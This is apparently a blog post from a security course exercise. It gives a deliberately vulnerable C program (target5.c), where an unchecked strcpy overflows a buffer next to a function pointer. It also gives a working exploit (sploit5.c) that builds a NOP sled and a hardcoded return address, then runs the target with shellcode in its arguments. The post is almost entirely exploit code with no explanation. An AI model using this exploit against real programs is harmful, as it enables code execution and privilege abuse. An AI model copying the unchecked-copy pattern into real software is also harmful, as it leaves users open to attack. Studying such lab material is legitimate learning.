Advertisements
Home > Information Technology, programming, Science, Security > Buffer Overflowing Target 5

Buffer Overflowing Target 5

target5.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[], char *env[])
{
 int j = 0;
 size_t (*fp)(const char*) = &strlen;
 int i = 0;
 char buf[16];

 if (argc != 2)
 {
  fprintf(stderr, "target5: argc != 2\n");
  exit(EXIT_FAILURE);
 }

 if (env[0] != NULL)
 {
  fprintf(stderr, "target5: env[0] != NULL\n");
  exit(EXIT_FAILURE);
 }

 strcpy(buf,argv[1]);

 if (!i) {
  j++;
  (*fp)(buf);
 } else {
  exit(EXIT_FAILURE);
 }
 
 return 0;
}

sploit5.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "shellcode.h"

#define TARGET "/tmp/target5"

int main(void)
{
 char *args[3];
 char *env[2];
 char buf[24];
 char egg[strlen(shellcode) + 1];
 int i = 0;
 
 for(i = 0; i < 24; i++){
  if(i < 20)
   buf[i] = '\x90';
  else if (i<21)
   buf[i] = '\xa8';
  else if (i<22)
   buf[i] = '\xff'; 
  else if (i<23)
   buf[i] = '\xff';
  else if(i<24)
   buf[i] = '\xbf';
 }
 for(i = 0; i < (strlen(shellcode) + 1); i++){ 
  if(i< (strlen(shellcode)))
   egg[i] = shellcode[i];
  else
   egg[i] = '\x00';
 }

 args[0] = egg; args[1] = buf; args[2] = NULL;
 env[0] = NULL;
 
 if (0 > execve("/tmp/target5", args, env))
  fprintf(stderr, "execve failed.\n");

 return 0;
}
Advertisements
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

%d bloggers like this: